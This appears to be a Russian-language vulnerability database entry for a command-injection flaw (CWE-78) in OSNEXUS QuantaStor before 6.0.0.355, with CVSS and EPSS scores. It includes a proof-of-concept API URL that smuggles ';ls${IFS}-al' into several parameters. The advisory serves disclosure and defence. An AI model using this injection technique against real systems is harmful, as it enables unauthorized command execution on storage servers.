Описание
An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API.
POC http://<IP_ADDRESS>/qstorapi/storageSystemModify?storageSystem=&newName=quantastor&newDescription=;ls${IFS}-al&newLocation=4&newEnclosureLayoutId=5&newDnsServerList=;ls${IFS}-al&externalHostName=&newNTPServerList=;ls${IFS}-al
Ссылки
- Third Party Advisory
- Product
- Third Party Advisory
- Third Party Advisory
- Product
- Third Party Advisory
Уязвимые конфигурации
Конфигурация 1Версия до 6.0.0.355 (исключая)
cpe:2.3:a:osnexus:quantastor:*:*:*:*:*:*:*:*
EPSS
Процентиль: 25%
0.00085
Низкий
9.1 Critical
CVSS3
7.2 High
CVSS3
Дефекты
CWE-78
CWE-78
Связанные уязвимости
CVSS3: 9.1
github
больше 2 лет назад
An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API.
EPSS
Процентиль: 25%
0.00085
Низкий
9.1 Critical
CVSS3
7.2 High
CVSS3
Дефекты
CWE-78
CWE-78